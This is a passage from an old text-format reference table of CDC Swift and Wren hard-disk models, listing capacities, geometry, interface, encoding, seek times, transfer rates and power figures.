ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + CDC SWIFT 94354-160 3.50 HALF 162.0MB 143.0MB 1072 29 5 9 VC IDE(AT) RLL(2,7) Y 15mS 8.0Mb 70K 11.0W + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + CDC SWIFT 94354-186 3.50 HALF 186.0MB 164.0MB 1272 4 7 VC IDE(AT) RLL(2,7) Y 15mS 10.0Mb 70K 11.0W + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + CDC SWIFT 94354-200 3.50 HALF 201.0MB 177.0MB 1072 36 5 9 VC IDE(AT) RLL(2,7) Y 15mS 10.0Mb 70K 11.0W + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + CDC SWIFT 94354-230 3.50 HALF 239.0MB 211.0MB 1272 36 5 9 VC IDE(AT) RLL(2,7) Y 15mS 10.0Mb 70K 11.0W + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + CDC SWIFT 94355-055 3.50 HALF 55.0MB 46.0MB 17 3 5 VC ST412 MFM 17mS 5.0Mb + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + CDC SWIFT 94355-100 3.50 HALF 100.0MB 88.0MB 1072 17 5 9 VC ST412 MFM 1350 Y 15mS 5.0Mb 70K 9.0W + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + CDC SWIFT 94355-150 3.50 HALF 150.0MB 133.0MB 1072 28 5 9 VC ST412 RLL(2,7) 1350 Y 15mS 7.5Mb 70K 9.0W + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + CDC SWIFT 94356-111 3.50 HALF 111.0MB 98.0MB 1072 3 5 VC ESDI RLL(2,7) Y 15mS 10.0Mb 70K 11.0W + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + CDC SWIFT 94356-155 3.50 HALF 156.0MB 138.0MB 1072 4 7 VC ESDI RLL(2,7) Y 15mS 10.0Mb 70K 11.0W + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + CDC SWIFT 94356-200 3.50 HALF 201.0MB 177.0MB 1072 5 9 VC ESDI RLL(2,7) Y 15mS 10.0Mb 70K 11.0W + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + CDC WREN I 94155-021 5.25 FULL 21.0MB 670 17 2 3 ST412 MFM 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ACC RATE MTBF USED COMMENTS + ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ + CDC WREN I 94155-025 5.25 FULL 25.0MB 697 17 2 4 ST412 MFM 28mS 5.0Mb + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + CDC WREN I 94155-028 5.25 FULL 28.0MB 24.0MB 697 17 2 4 ST412 MFM 28mS 5.0Mb + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + CDC WREN I 94155-036 5.25 FULL 36.0MB 30.0MB 697 17 3 5 ST412 MFM 36mS 5.0Mb + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + CDC WREN I 94155-038 5.25 FULL 38.0MB 31.0MB 733 17 3 5 ST412 MFM 28mS 5.0Mb + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + CDC WREN II 94155-048 5.25 FULL 48.0MB 40.0MB 925 17 3 5 VC ST412 MFM Y 28mS 5.0Mb + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + CDC WREN II 94155-051 5.25 FULL 51.0MB 43.0MB 989 17 3 5 ST412 MFM 28mS 5.0Mb + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + CDC WREN II 94155-057 5.25 FULL 57.0MB 48.0MB 925 17 3 6 ST412 MFM 28mS 5.0Mb + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + CDC WREN II 94155-067 5.25 FULL 67.0MB 56.0MB 925 17 4 7 ST412 MFM 28mS 5.0Mb + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + CDC WREN II 94155-077 5.25 FULL 77.0MB 64.0MB 925 17 4 8 ST412 MFM 28mS 5.0Mb + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + CDC WREN II 94155-085 5.25 FULL 85.0MB 71.3MB 1024 17 5 8 VC ST412 MFM 980 Y 28mS 5.0Mb 40K 28.0W + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + CDC WREN II 94155-086 5.25 FULL 86.0MB 72.5MB 925 17 5 9 VC ST412 MFM 960 Y 28mS 5.0Mb 40K 28.0W + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + CDC WREN II 94155-096 5.25 FULL 96.0MB 80.2MB 1024 17 5 9 VC ST412 MFM 980 Y 28mS 5.0Mb 40K 28.0W + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + CDC WREN II 94155-135 5.25 FULL 135.0MB 115.0MB 960 26 5 9 VC ST412 RLL(2,7) 980 Y 28mS 7.5Mb 40K 28.0W + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + CDC WREN II 94156-048 5.25 FULL 48.0MB 40.2MB 925 3 5 VC ESDI RLL(2,7) Y 28mS 5.0Mb + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + CDC WREN II 94156-067 5.25 FULL 67.0MB 56.0MB 925 4 7 VC ESDI RLL(2,7) Y 10.0Mb + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + CDC WREN II 94156-086 5.25 FULL 86.0MB 72.0MB 925 5 9 VC ESDI RLL(2,7) Y 10.0Mb + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + CDC WREN II 94204-074 5.25 HALF 74.0MB 65.5MB 941 3 5 VC IDE(AT) RLL(2,7) Y 28mS 7.5Mb 40K 20.0W + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + CDC WREN II 94204-081 5.25 HALF 81.0MB 71.3MB 1024 3 5 VC IDE(AT) RLL(2,7) Y 28mS 7.5Mb 40K 20.0W + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + CDC WREN II 94205-051 5.25 HALF 51.0MB 43.0MB 989 17 3 5 VC ST412 MFM 960 Y 28mS 5.0Mb 40K 18.0W + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + CDC WREN II 94205-077 5.25 HALF 77.0MB 63.3MB 989 26 3 5 VC ST412 RLL(2,7) 980 Y 28mS 7.5Mb 40K 18.0W + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + CDC WREN II 94208-075 5.25 HALF 75.0MB 60.0MB 966 3 5 VC IDE(?) RLL(2,7) Y 30mS 7.5Mb COMPAQ, TYPE 47 + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + CDC WREN II 94295-051 5.25 FULL 51.0MB 43.0MB 989 3 5 0 VC ST412 MFM Y 28mS 5.0Mb + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + CDC WREN III 94161-086 5.25 FULL 86.0MB 969 0 0 VC SCSI RLL(2,7) Y 17mS + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + CDC WREN III 94161-101 5.25 FULL 101.0MB 86.0MB 969 3 5 VC SCSI RLL(2,7) Y 17mS 10.0Mb + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + CDC WREN III 94161-121 5.25 FULL 121.0MB 969 0 0 VC SCSI RLL(2,7) Y 17mS + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + CDC WREN III 94161-141 5.25 FULL 141.0MB 121.0MB 969 4 7 VC SCSI RLL(2,7) Y 17mS 10.0Mb + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + CDC WREN III 94161-182 5.25 FULL 182.0MB 160.0MB 969 5 9 VC SCSI RLL(2,7) Y 17mS 10.0Mb 100K 21.0W + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + CDC WREN III 94166-101 5.25 FULL 101.0MB 86.0MB 969 3 5 VC ESDI RLL(2,7) Y 17mS 10.0Mb + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + + þ + + + + + + + + + PAGE 5 + --SIZE-- -----CAPACITY---- PRE- S/ # RW HD INTER- RECORD TKS AVE XFER POWER + MANUFACTURER MODEL NUMBER WTH. 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RLL(2,7) Y 18mS 10.0Mb 100K 20.0W + 